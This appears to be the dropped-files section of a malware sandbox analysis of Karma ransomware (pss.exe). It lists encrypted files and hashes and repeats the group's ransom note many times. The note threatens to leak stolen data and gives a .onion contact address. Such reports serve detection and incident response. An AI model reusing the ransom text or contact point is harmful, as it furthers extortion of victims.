Preview: .+..2)U;.ne....^t..$.U.A..........~...........0.F.".f...d....KARMA/......`..{..z.a.f.v.=...Y.|f...I...</m.......F|.B..(..|.T...,......y;..)..Fi.~......>:.9".....x..Q....:.......x.C......B.d...r.[9........1....[5xYW..j........<...9.MB.).:.......)%w...'}....J../.m.D.......WV.:..)&uB....8FC*:..b.f.Y.....G:r.\..fNC.......g...C.s.AH......0......&z.D......aC.}i.....0y?v..T...A@....c.....5..HX15.[..P.........a`..r.&..=E..&D;-.D*.xJ..cf.#....+...".iXg.e.......uRQ..?..)4E.@.FM.+"I....O.Xj5.rq....>.l.......W.R+...O........}..)......^[.a.N,.H1...#....m..H.5GG..&......=c.;. r~....(i...B5.....Y......M..f. r*...H...o|.].&..Ef.g.....u{}.*.PEt...{b.................n.`.U.W(.(.7..o...g{h....f.......H&..#..;.L........a.6&. n..vQ.T.|..[NAYI.s-....6%....5.i.........%.F..E....!..J..\....(.9+..bz..M..b.C`...Ri.t....N..q. o."y.sX.KC6&...E}..b....*>Dp...wi;'fG7WA.~,.hc.V.w.D../k..T....o../&.4...n......o..A.p......JkW......W....1R(EYyn&...D..%.aB.Y$.D
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):69
Entropy (8bit):5.611935145089897
Encrypted:false
SSDEEP:3:h80auaTk6BPL74N7QTfTVR:fgk65LUUT77
MD5:A109BDE54DD86233806EA2C033109FA5
SHA1:FCD03F321C7BC63DE652EA4C680C40E4F7F5FE73
SHA-256:7BF26158BDDEE1438002E3F2C734FD468BF93CED21A30ED54AE62A583D8A86D1
SHA-512:B22060676D08A83257926268B770275F066D8DD9147B4C2D069B65241F0A19A062BBC48FDBBD7391C63BD180A7709AF8E4F532461887F2B8B199965EA05D14CC
Malicious:false
Preview: P.{.k:..Q...J'...n...J.*.[....i4(.F..B.e..9......M...M..Z...KARMA
C:\Users\user\AppData\Roaming\Microsoft\Network\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Office\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Office\MSO1033.acl
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):37799
Entropy (8bit):7.99476165829671
Encrypted:true
SSDEEP:768:++Y/ErqYfl1uHBdfmlNioI1gJc7XIiEblDpZkeqyibJs4u:7YcqYLWbfmlNioI1gJaVqDpZkeqPs4u
MD5:C57D0D59C16142EEAAF24E2E5EF27E2B
SHA1:83060813D8905F8645F346E491826AB2345EFF77
SHA-256:A350AA9AAEA6B1C4EF5CFA904DCDB67673C14833665AAA317AC0769DFDFCFE00
SHA-512:A0C8D1D78DC06AF8B16AA7A552A0FAD210EF9C01550D01A29AF2CAC62DF6154E528532ED8879476915BFB7477A6CF9C01090355395CD70B3F26C50CFBF342A77
Malicious:true
Preview: .Z...}iIp4^..9jO.l<.<x0.2..b....SK.>.P,.e..T.[:.9}.).&!.mq...KARMA"(a..8b...F.PtEk"x.Z.u.......-..PW.....Y:..G@.^+ZK.%.WU...... ...2U^.@#.y[~.j..H .iNn.v\..W....f.....5l...E.hb.b..n.....L.N.m.}...JN.z.....a....4tR.g|........^..l.b......R..1Wh...:9.~.Fj.b.."....|N..F....HH....Q..2.*.......;6.@...X..z..~......37C.t5L.3.7EkH=...&......jC.F..aj.h3&@.E.l....}l..{.....?......f..<..P6.R.N.+-.JK+W7..:.F.m..&..b..G.I.&...lB...w..E..eF....x.11.I.].....i..w_.......\....>..w7..X/.....7...o.o.g....~.p..~.....Z.X...b.k..0......um......C.......0.-o.)gWa..CzMu.?.....R..(-z...$.vTNu>T...}`..mB....e..lC..`.tF.......r......9..<..0\...w;.q|..:.j.....io.........E..W..8.N.....P.Y.....4.W....*v..;..qaT.NG..A..lZVU.......W..*o.....|.k.....S.,...c..a.X.U.-V..\....!...~M...P....F..?......QoI...Yj..tqz.*..`..g..wg3`....W..w..8Lo..I./..Y..N6e.xY{..sS.9...ez.,iei...-.....-Ur..@.cU2.>o...........`.i...gg....l|.8.n..<..}Zs.'.......H.o...2!..[.`)g.W'..8...Eg1...a..]..:.~o.*.l..
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):97
Entropy (8bit):6.2132141308023225
Encrypted:false
SSDEEP:3:+//fxhNbfgQ3By4iCqyF5uRg1jUKbTGOTfdWTn:+///SQV5t6ETfdm
MD5:007BC1831FF05EEE0EA81BA30DF030F0
SHA1:040A99AE793871EF8216DFCCA5CA5ED4AFE4A061
SHA-256:926485480827286A97FD280706F1E40E241C09BA4963F39EB2189CD79807741F
SHA-512:BAE1CB9B18C31873CE3C8F88A8744A3D6477B468BFA394995A021E9A3FAB6AE97F6FB1D056A674FB7A83A5554ED151F380A40BF2D23EF7ECD10AB8742F85A1F7
Malicious:false
Preview: ^..29.*...:nv...~6..P...u.ts.......U.g.3:.~c..x...y..I.D.>L...KARMA?..6zP...\,.mG8"....h....7
C:\Users\user\AppData\Roaming\Microsoft\Proof\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Protect\CREDHIST
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):381
Entropy (8bit):7.451231587691226
Encrypted:false
SSDEEP:6:Akcpsld8Bd4LUrF6OuJFdRhj8lq1OJPD+y03Lp6hPypwrV/lOfFwny8vPFmviu/G:AkKsld8ELUJ0JFd7AoOJKyE4hP7rPQFc
MD5:D702FA9B4E3C28A5D47B763C15DA78DF
SHA1:A48A0A8F0A24A75DB47080274E88152F1FB9489F
SHA-256:4D1E79597DAB4CE91F136F868D332675CD5062C3B66D41C94DAAFB53B8A97451
SHA-512:0AE0881E5A647709BAB0C4D81DFC15FE4C75535A523C80460B94823325FCAB68DED7CBA31135580EEF48581FC124AD56C79C3DCD4FCCF084EBAC224013771037
Malicious:false
Preview: {..-AGz..;.Wu..w8.........!......YG9....J3.').!B..nyX.MB.]...KARMAP..M..!I...b.:=g......$.a]....}..".z8.3......_pa..{.....W... .?=....x..\..=..#D:q..!.Nz@......@......,.]...m'.u.......y.Lw.7A~.?..V..........U8...L.5.6n..].?{..l.6q.}*o.s..q..&...|...O.....J{.......=.v._..ZF....@..T$._!. .nX.W.n.#.7"....1Q.X.<$....|E..K+......B[.#....-.Ce....=..[.u.$:"h.....@..`!6r.
C:\Users\user\AppData\Roaming\Microsoft\Protect\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\8a95f74b-deb7-4d33-9ab4-dd6c9dcc72dc
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):537
Entropy (8bit):7.600491554827822
Encrypted:false
SSDEEP:12:0gjBzrRLiozkfUxpL2uydgi5kvNC2Bv373UQSbp:HjBzrXz0UT0Z5yNBvs
MD5:43A0F50AF6D618CC163AE8D344553D8E
SHA1:7A97ED6BADD66437DD2F87AEAD61D0E02D2FEE14
SHA-256:24E5B73E6A8BFC9D9419D9B0C7912BD813C22E6A66CB61B2869BD063C58DF044
SHA-512:45FE7335218E6F7CC855D750CCD4E76E54DCFC439380F9C69602E12AB386B7166B7165C8AF82B13074267BF41B282E1D4137AE8C909C45B33639350805B1F5EF
Malicious:false
Preview: ..%k.|..7.e.&.S.h+g.I...rC.....ZN.9...0.VC.....T..qEF?.5.....KARMA-...=............RR.x).FZ.W.....F}.....u.:...oqU.+.....CM...G..9c...h...q...(.u..>.B.*2u...+........`..]....Ue..1.6..NV.......6K....sr......G.W..p..q..h.k..7x.`....;2#.G.oK..mW|M#..p..R...*.>.GF....R.Ls...c..|...ta0c2..I......G..3(p...x=j....'P.&..6...(.....l..._.....k..l.....nW........F....nR....#>....&5.....1.L_..SS...1.I.Mt.0...MZ...{^..b.......t.OZ.9&....a.dDO...8.!....."T"7^uth...z.&.?....\e.......`..&.........I..7...H+..Y`.'..2.]...
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\Preferred
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):93
Entropy (8bit):6.062120875875773
Encrypted:false
SSDEEP:3:jvpsMeWaDlS666tsOH0SetH4eXy01n:Tpsfn5S6IcOH4s91n
MD5:86C072C5C1E6493EECEB8793F89EE7AC
SHA1:E8A9464972DAACD49D8F471467DDD3744D090BA4
SHA-256:A7DB8AA88707BD64BB6812DA05412E436E2E38220BE44B46BCF00021124E67CE
SHA-512:720E76CE75DC66EB7214BA99705A158756E33059F48C46FDA506F2C5302BF0AB957B9C6E6F598209BA0FDE595EBC763370B2F45E2DB0A78109329E3F56CF9810
Malicious:false
Preview: ...A.I.{.#.`N.....+..Z...X.?...7,..,TYj.....[..I.[..B'....L...KARMAH.1}......y....B.r..`K.
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\b5958470-8ce5-4bb4-8d3a-2c85a109dae0
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):537
Entropy (8bit):7.61202645802131
Encrypted:false
SSDEEP:12:EbyIt641a8adneLF1W7ElOmyeEDeGjDSKWKw4h7HHdzKlOUq:iyIL1axARSElOpeGfCKw4h75R
MD5:E5950051B096030609808B7BA7448C4E
SHA1:B960AA9237FF3D35CBF0DE370AAF8BC9D14F1482
SHA-256:43A8BCDFF428FCDD892224F21808E6D6309447E86894ED733FCD7C5BC4F131B6
SHA-512:CADEC9C4EBA847DA0670F82B3337447F20CEC724ECDC96B34EE179C7C4C535B7001BA20264A80BDA037F6A0421A684754096573D71B77E8D87B80A0092A43804
Malicious:false
Preview: ...<N00s....;........!..K<.......B..?.?...Ar NW....@[..+...KARMAc'p.@.y....:..Z*...C.e5.a@. 5Z.DD*l...\.?f.....Y..0....?2....T..r..'..!,......{.`..t..o.|....c...n.#!."Q..r.0..L/bg&4...P.Z.:T....r..X^.).....f.,c.3...%..t....Q..?....YbM.w.}c.u.].......sd.]_..{+._..=..........4.....c..W.+..O.:.9.{6&.)f.......=V.g.A.6..._...#.....?i.....Uu...,.....=F.p....;.......`W......+.s.....=.....Ip.....".......1...e.y.:.7.5.3....{...k&.i.....es.B.....j....jPCE.O...3.22..2&..f.......).g.......|.%...1P..)....@.h..,.
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-3853321935-2125563209-4053062332-1002\f46745b7-7051-49e0-b579-fcf31786d9fb
Process:C:\Users\user\Desktop\pss.exe
File Type:PGP\011Secret Key -
Category:dropped
Size (bytes):537
Entropy (8bit):7.535032634267722
Encrypted:false
SSDEEP:12:VKFJfB3y4MdiiUQK/Ms/9VHIzlUbqDsdMVLTu8UmX1gm2B:myRIn0iq/DxLSxmlgmi
MD5:C508A3CFA7DA0D50B66C772A1060C498
SHA1:D2D05B745AEF86F03EBD2E5FEF473DA296ACF71D
SHA-256:5F760A87B226DC4E7321B5AC13690BB4C4299AC22B111F11D7443ACAA9DB7F13
SHA-512:51A45A3FF2043F49AF2404717B61FA89284C86B398AC704A7269D4936D1D3E48C432CBE0544D1DCBFF12E8AF29723BE6D12AAB6B4522AD84870313BDBA8701D0
Malicious:false
Preview: .OH.....e...T.O.....Be....x....sa...B_*..I...x.V.....2..Z....KARMA....6.,D~t..@.H.8..|L.*.........-.;..x.....<6/..Q7.3g....J^.8;.2....h..=.,Q....1.3b...,.. ..@..}.*A.zQ)k..T.......q..L.'....g.ZBg_..x[C..X@..hG...3....=...h...Z.RK3td#B]S..lB.S.d....1r.....=....l..~.C...v..........?.t.V.,W.H?.....V&......(|vm.U..["..a.Y..-...V.UU.L........yCXs.ax..../M.veJkZl....(..C..Z&..%.-......g]Q........E...S7)M.].)..Hp.........L......M...;..........d..e...B...6.\......c.Ut7Z.^.....q.Z......\....L..'H..0.y
C:\Users\user\AppData\Roaming\Microsoft\Protect\SYNCHIST
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):145
Entropy (8bit):6.699842603984348
Encrypted:false
SSDEEP:3:5YaJ4In/qUncOLys6s0oBPzvXyHxjMDn+AUWCDUYp814N2:5YaJ4In/pc46s00PSjCNiiA2
MD5:F77CAB5D019D1BDE5319A4B343B6107B
SHA1:94F87E67B099B784040508AF35EA7538F27739ED
SHA-256:8BB899D684657193035823F8C7BC7BD03ACF8F1631DC3C0B883FCE7EE0365AA8
SHA-512:C185A5F45ED3AE1051E4402B74C3C7E52E0AFA70C00322A3C6A79FCA0669DFAF9AA1BE895755BE903F48C7BB85F82C9B0BF29C30C5E92EA6FD0FDBA5500BACFB
Malicious:false
Preview: oX.}.=.D..B.0..P.....7.)....;.........<Cx..,.J.o..3.W.&}3.xO6...KARMA.H.j....../w..<...]i.u...tfM....N8.g.....F.Pz#e..qfl..R=...II.....X..>w
C:\Users\user\AppData\Roaming\Microsoft\Speech\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Spelling\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
